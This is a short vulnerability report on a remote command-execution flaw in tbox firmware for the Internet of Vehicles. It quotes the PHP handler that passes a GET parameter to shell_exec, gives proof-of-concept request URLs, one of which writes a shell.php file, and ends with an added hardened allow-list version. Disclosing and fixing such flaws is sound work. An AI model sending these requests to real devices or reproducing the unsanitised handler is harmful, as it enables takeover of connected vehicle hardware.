The execute-command.php file exists in the \www\pages\matrix-gui-2.0 directory of the firmware.
Vulnerability type: command execution
This source code is used for the tbox in the Internet of Vehicles, which can control the car's brain, so it is very dangerous.
```php
<?php
$command = $_GET['command'];
$output = shell_exec($command);
echo $output;
?>
```
Command execution is carried out through shell_exec, and the content executed is controlled by the command parameter passed via GET.
Vulnerability exploitation process:
Pass the command parameter via GET to shell_exec for command execution and final output.
POC:
/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php
Example:
http://192.168.160.128:7777/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php
To sum up, the device has a remote command execution vulnerability, which can be performed by injecting malicious code to obtain server permissions.
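
A hardened counterpart to the handler quoted in the report, as an added example that is not part of the original issue or the firmware's own code: the request selects a named action from a fixed table and the program is started without a shell. The `action` parameter, the `ALLOWED_ACTIONS` entries and their paths are hypothetical, and PHP 7.4 or later is assumed for the array form of `proc_open`.

```php
<?php
// Added example, not the firmware's code. The client names an action;
// it never supplies a command string.

// Hypothetical allow-list: the actions the GUI really needs are an assumption.
const ALLOWED_ACTIONS = [
    'uptime'   => ['/usr/bin/uptime'],
    'list_www' => ['/bin/ls', '-1', '/www/pages'],
];

function resolve_action($name): ?array
{
    // Rejects non-strings (e.g. action[]=x) and any value that is not an
    // exact key, so shell metacharacters never reach a process call.
    if (!is_string($name) || !array_key_exists($name, ALLOWED_ACTIONS)) {
        return null;
    }
    return ALLOWED_ACTIONS[$name];
}

function run_action(array $argv): string
{
    // An array command (PHP >= 7.4) is executed directly, without /bin/sh,
    // so redirection and command chaining have no meaning here.
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        return '';
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out === false ? '' : $out;
}

if (PHP_SAPI !== 'cli') {
    $argv = resolve_action($_GET['action'] ?? null);
    if ($argv === null) {
        http_response_code(400);
        exit('unknown action');
    }
    // Plain text plus nosniff keeps command output from rendering as HTML.
    header('Content-Type: text/plain; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    echo run_action($argv);
}
```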